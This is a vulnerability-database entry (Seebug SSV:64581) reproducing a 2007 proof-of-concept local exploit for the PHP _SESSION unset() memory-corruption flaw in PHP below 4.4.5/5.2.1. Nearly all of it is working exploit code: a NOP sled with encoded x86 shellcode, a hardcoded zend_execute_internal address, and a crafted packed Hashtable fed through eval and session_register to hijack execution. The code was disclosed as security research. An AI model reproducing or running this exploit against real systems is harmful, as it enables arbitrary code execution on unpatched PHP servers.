Lucene search

K
seebugRootSSV:64581
HistoryJul 01, 2014 - 12:00 a.m.

PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit

2014-07-0100:00:00
Root
www.seebug.org
26

No description provided by source.


                                                &#60;?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || &#39;_|/ _` |/ -_)| &#39; \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //                 PHP _SESSION unset() Vulnerability                 //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die(&#34;REMOVE THIS LINE&#34;);

  $PHP_MAJOR_VERSION = PHP_VERSION;
  $PHP_MAJOR_VERSION = $PHP_MAJOR_VERSION[0];

  $shellcode = str_repeat(&#34;\x90&#34;, 256).
      &#34;\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46&#34;.
      &#34;\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f&#34;.
      &#34;\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6&#34;.
      &#34;\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06&#34;.
      &#34;\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc&#34;.
      &#34;\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d&#34;.
      &#34;\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65&#34;.
      ($PHP_MAJOR_VERSION==4?&#34;\x18\xb0\x53&#34;:&#34;\x18\xb0\x83&#34;);

  $zend_execute_internal = 0x08345b08;

  $Hashtable = pack(&#34;LLLLLLLLLCCC&#34;, 2, 1, 0, 0, 0, $zend_execute_internal, 0, $zend_execute_internal, 0x66666666, 0, 0, 0);

  eval(&#39;
  session_start();
  unset($HTTP_SESSION_VARS);
  unset($_SESSION);
  $x = &#34;&#39;.$Hashtable.&#39;&#34;;
  session_register($shellcode);&#39;);
?&#62;

# milw0rm.com [2007-03-25]